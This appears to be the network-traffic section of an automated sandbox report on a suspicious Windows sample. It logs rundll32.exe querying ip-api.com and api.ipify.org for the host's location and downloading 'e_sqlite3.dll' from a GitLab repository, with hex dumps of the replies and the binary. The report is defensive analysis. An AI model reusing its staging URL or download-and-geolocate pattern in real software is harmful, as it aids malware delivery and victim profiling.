                                                                                                                                                      Jan 14, 2025 13:26:37.208955050 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:37.208970070 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.382350922 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.382417917 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.382566929 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:37.382755995 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:37.382797003 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.383764982 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:37.388693094 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.388788939 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:37.388930082 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:37.393759966 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.854382992 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.858211040 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:37.864192963 CET8050074208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.865961075 CET5007480192.168.2.4208.95.112.1
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 14, 2025 13:25:36.885777950 CET6074253192.168.2.41.1.1.1
                                                                                                                                                      Jan 14, 2025 13:25:36.892541885 CET53607421.1.1.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:39.877532005 CET6012853192.168.2.41.1.1.1
                                                                                                                                                      Jan 14, 2025 13:25:39.884676933 CET53601281.1.1.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.153228998 CET5267153192.168.2.41.1.1.1
                                                                                                                                                      Jan 14, 2025 13:25:41.160603046 CET53526711.1.1.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.394745111 CET4952953192.168.2.41.1.1.1
                                                                                                                                                      Jan 14, 2025 13:26:34.401937962 CET53495291.1.1.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.647917032 CET5403753192.168.2.41.1.1.1
                                                                                                                                                      Jan 14, 2025 13:26:35.655071974 CET53540371.1.1.1192.168.2.4
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Jan 14, 2025 13:25:36.885777950 CET192.168.2.41.1.1.10x6459Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:39.877532005 CET192.168.2.41.1.1.10x378fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:41.153228998 CET192.168.2.41.1.1.10xa5d1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:34.394745111 CET192.168.2.41.1.1.10xd59bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:35.647917032 CET192.168.2.41.1.1.10x94a8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Jan 14, 2025 13:25:36.892541885 CET1.1.1.1192.168.2.40x6459No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:39.884676933 CET1.1.1.1192.168.2.40x378fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:39.884676933 CET1.1.1.1192.168.2.40x378fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:39.884676933 CET1.1.1.1192.168.2.40x378fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:25:41.160603046 CET1.1.1.1192.168.2.40xa5d1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:34.401937962 CET1.1.1.1192.168.2.40xd59bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:34.401937962 CET1.1.1.1192.168.2.40xd59bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:34.401937962 CET1.1.1.1192.168.2.40xd59bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 14, 2025 13:26:35.655071974 CET1.1.1.1192.168.2.40x94a8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                      • gitlab.com
                                                                                                                                                      • api.ipify.org
                                                                                                                                                      • ip-api.com
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449964208.95.112.1804564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Jan 14, 2025 13:25:41.208766937 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                      Host: ip-api.com
                                                                                                                                                      Jan 14, 2025 13:25:41.660679102 CET483INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:41 GMT
                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                      Content-Length: 306
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      X-Ttl: 60
                                                                                                                                                      X-Rl: 44
                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.449976208.95.112.1804564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Jan 14, 2025 13:25:42.933598042 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                      Host: ip-api.com
                                                                                                                                                      Jan 14, 2025 13:25:43.392640114 CET483INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:43 GMT
                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                      Content-Length: 306
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      X-Ttl: 58
                                                                                                                                                      X-Rl: 43
                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.450071208.95.112.1807560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Jan 14, 2025 13:26:35.661570072 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                      Host: ip-api.com
                                                                                                                                                      Jan 14, 2025 13:26:36.125983953 CET482INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:35 GMT
                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                      Content-Length: 306
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      X-Ttl: 5
                                                                                                                                                      X-Rl: 42
                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.450074208.95.112.1807560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Jan 14, 2025 13:26:37.388930082 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                      Host: ip-api.com
                                                                                                                                                      Jan 14, 2025 13:26:37.854382992 CET482INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:37 GMT
                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                      Content-Length: 306
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      X-Ttl: 3
                                                                                                                                                      X-Rl: 41
                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449933172.65.251.784434564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:25:37 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                      Host: gitlab.com
                                                                                                                                                      2025-01-14 12:25:37 UTC512INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:37 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 1780736
                                                                                                                                                      Connection: close
                                                                                                                                                      CF-Ray: 901d9c193b99f793-EWR
                                                                                                                                                      CF-Cache-Status: REVALIDATED
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                      Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                      ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      2025-01-14 12:25:37 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                      Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                      2025-01-14 12:25:37 UTC502INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 42 33 48 38 47 6b 56 57 49 7a 42 52 30 4d 79 68 41 57 51 5a 25 32 42 48 25 32 42 25 32 46 6a 6d 66 69 6e 71 6a 73 37 70 4f 76 36 4f 78 68 57 6e 6a 50 73 6f 6c 76 45 66 44 62 38 64 76 36 69 78 39 52 69 62 56 71 76 76 69 53 52 75 63 57 36 62 61 72 79 72 32 70 47 75 4e 66 47 34 50 45 63 51 63 6b 77 6e 71 75 74 61 58 73 25 32 42 46 7a 6d 57 70 48 30 39 56 62 44 69 7a 38 6f 44 76 77 52 4d 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                                                                                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QB3H8GkVWIzBR0MyhAWQZ%2BH%2B%2Fjmfinqjs7pOv6OxhWnjPsolvEfDb8dv6ix9RibVqvviSRucW6baryr2pGuNfG4PEcQckwnqutaXs%2BFzmWpH09VbDiz8oDvwRMk%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                                                                                                                      2025-01-14 12:25:37 UTC959INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 57 48 83 ec 20 48 8b 39 48 8b d9 e8 7b aa 0a 00 48 8b 4b 38 e8 82 9f 01 00 48 8b cb e8 fa 3b 01 00 83 47 58 ff 75 17 80 7f 28 00 75 11 48 8b 4f 70 48 c7 47 70 00 00 00 00 e8 fd 2d 02 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 0f b6 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 e8 32 a8 12 00 85 c0 75 1d 8d 48 08 e8 46 0f 0f 00 48 85 c0 74 10 33 c9 48 89 08 48 89 03 33 c0 48 83 c4 20 5b c3 b8 07 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 48 83 ec 28 e8 77 3b 01 00 33 c0 48 83 c4 28 c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec
                                                                                                                                                      Data Ascii: H\$WH H9H{HK8H;GXu(uHOpHGp-H\$03H _A@SH I2uHFHt3HH3H [H [H(w;3H(H\$Ht$WH
                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: 01 00 83 fd 65 41 0f 44 ec 8b c5 eb ca cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 10 4c 89 40 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 4c 8b 29 33 ed 0f 29 70 b8 4d 8b f0 0f 29 78 a8 8b da 44 0f 29 40 98 4c 8b e1 41 ff 45 48 44 8b fd 49 63 f9 48 89 68 08 e8 19 a5 0a 00 41 89 5c 24 0c 83 fb 01 0f 85 91 01 00 00 48 8b b4 24 c0 00 00 00 48 8b 0e e8 7b af 01 00 48 8b 1e 44 8b f5 48 8d 2d 8e 85 16 00 48 8b f8 0f b7 4b 14 83 e1 3f 0f b6 04 29 83 f8 03 75 15 33 d2 48 8b cb e8 c1 d9 02 00 0f b7 43 14 83 e0 3f 0f b6 04 28 83 f8 01 74 4e 83 f8 02 75 3c 48 8b 0e 0f b7 41 14 a8 08 74 06 f2 0f 10 01 eb 1c a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 0e a8 12 74 07 e8 04 9f 09 00 eb 03 0f 57 c0 0f 28 c8 48 8b cf e8 34 e7 0e 00 85 c0 74 0d 33 db 41 c6 44 24 08
                                                                                                                                                      Data Ascii: eADHHXL@UVWATAUAVAWH`L)3)pM)xD)@LAEHDIcHhA\$H$H{HDH-HK?)u3HC?(tNu<HAt$tWH*tW(H4t3AD$
                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: 0f 2f c7 76 05 49 8b c3 eb 17 f2 48 0f 2c c0 eb 10 a8 12 74 68 48 83 79 08 00 74 61 e8 3e 9a 09 00 0f 57 c0 48 b9 00 00 00 00 00 00 01 00 f2 48 0f 2a c0 f2 0f 11 44 3b 08 48 3b c1 7d 13 48 b9 00 00 00 00 00 00 ff ff 48 3b c1 0f 8f b3 00 00 00 8b 44 3b 04 83 f8 43 75 0d c7 44 3b 04 42 00 00 00 e9 9d 00 00 00 83 f8 45 0f 85 94 00 00 00 c7 44 3b 04 44 00 00 00 e9 87 00 00 00 48 c7 44 3b 08 00 00 00 00 e9 79 00 00 00 83 fa 02 75 48 4b 8b 0c f9 0f b7 41 14 a8 08 74 0c f2 0f 10 01 f2 0f 11 44 3b 08 eb 5c a8 24 74 10 0f 57 c0 f2 48 0f 2a 01 f2 0f 11 44 3b 08 eb 48 a8 12 74 0d e8 ca 99 09 00 f2 0f 11 44 3b 08 eb 37 f2 0f 11 74 3b 08 0f 28 c6 eb 2c 48 c7 44 3b 08 00 00 00 00 83 fa 05 75 0a c7 44 3b 04 40 00 00 00 eb 14 33 c0 41 80 e8 42 41 80 f8 01 0f 97 c0 83 c0
                                                                                                                                                      Data Ascii: /vIH,thHyta>WHH*D;H;}HH;D;CuD;BED;DHD;yuHKAtD;\$tWH*D;HtD;7t;(,HD;uD;@3ABA
                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: 0f 11 43 40 33 c0 48 8b 4c 24 50 48 33 cc e8 e3 9a 14 00 4c 8d 5c 24 60 49 8b 5b 30 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 90 96 1e 00 00 9d 1e 00 00 a4 1e 00 00 a8 1e 00 00 af 1e 00 00 b3 1e 00 00 e3 1e 00 00 00 06 01 06 06 06 02 06 06 06 06 06 06 06 03 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 04 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 05 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f0 48 8b da 8b f9 e8 24 98 12 00 85 c0 0f 85 22 01 00 00 b9 88 00 00 00 e8 32 ff 0e 00 4c 8b c8 48 85 c0 0f 84 0c 01 00 00 0f 57 c0 33 c0 41 0f 11 01 41 0f 11 41 10 41 0f 11 41 20 41 0f 11 41 30 41 0f 11 41 40 41 0f 11 41 50 41 0f 11 41 60 41 0f 11 41 70 49 89 81
                                                                                                                                                      Data Ascii: C@3HL$PH3L\$`I[0Ik@IsHIA_A^A]A\_H\$Ht$WH IH$"2LHW3AAAAA AA0AA@AAPAA`AApI
                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: 20 48 8b 8c 24 80 00 00 00 48 89 01 eb 30 48 8b 8c 24 88 00 00 00 48 8d 15 20 b9 16 00 4c 8b c3 e8 18 1c 0d 00 bb 01 00 00 00 48 8b 4c 24 28 48 85 c9 74 0a 49 8b 45 10 ff 15 97 1e 16 00 49 8b ce e8 b7 26 01 00 4c 8b 7c 24 30 8b c3 4c 8b 64 24 78 48 8b 7c 24 70 48 8b 6c 24 60 48 83 c4 38 41 5e 41 5d 5e 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 18 48 8b d9 48 8b 49 20 48 8b 40 10 ff 15 4d 1e 16 00 48 8b cb e8 6d 26 01 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc 44 8b 02 33 c9 45 85 c0 7e 24 48 8b 42 08 48 83 c0 04 80 78 01 00 74 0b 83 78 fc 00 75 05 80 38 02 74 15 ff c1 48 83 c0 0c 41 3b c8 7c e4 c7 42 28 00 00 00 00 33 c0 c3 48 8b 42 20 48 63 c9 c7 42 28 01 00 00 00 c7 04 c8 01 00 00 00 48 8b 42 20 c6 44 c8 04 01 48 b8 00 00 00 00 00 00 f0 3f 48 89
                                                                                                                                                      Data Ascii: H$H0H$H LHL$(HtIEI&L|$0Ld$xH|$pHl$`H8A^A]^[@SH HAHHI H@MHm&3H [D3E~$HBHxtxu8tHA;|B(3HB HcB(HB DH?H
                                                                                                                                                      2025-01-14 12:25:37 UTC388INData Raw: c2 49 83 c3 18 41 83 fa 50 72 c9 48 8b 7c 24 10 b8 0c 00 00 00 5b c3 4b 8d 0c 52 48 8b 44 cf 10 48 85 c0 75 0a 48 8b 44 cf 08 48 89 44 cf 10 48 85 db 48 0f 44 d8 33 c0 48 89 5c cf 08 48 8b 7c 24 10 5b c3 48 89 5c 24 08 48 8d 1d 34 a5 19 00 4c 8b da 4c 8b d3 45 33 c9 66 66 66 0f 1f 84 00 00 00 00 00 4d 8b 02 49 8b c3 4d 2b c3 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 15 41 ff c1 49 83 c2 18 41 83 f9 50 72 cc 33 c0 48 8b 5c 24 08 c3 4b 8d 04 49 48 8b 44 c3 08 48 8b 5c 24 08 c3 cc cc cc cc cc 40 57 48 8d 3d c7 a4 19 00 4c 8b da 41 b8 ff ff ff ff 48 85 d2 74 51 48 89 5c 24 10 45 33 c0 48 8d 1d 12 ac 19 00 4c 8b d7 0f 1f 80 00 00 00 00 4d 8b 0a 49 8b c3 4d 2b cb 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 08 2b d1 75
                                                                                                                                                      Data Ascii: IAPrH|$[KRHDHuHDHDHHD3H\H|$[H\$H4LLE3fffMIM+B+uHutAIAPr3H\$KIHDH\$@WH=LAHtQH\$E3HLMIM+B+u
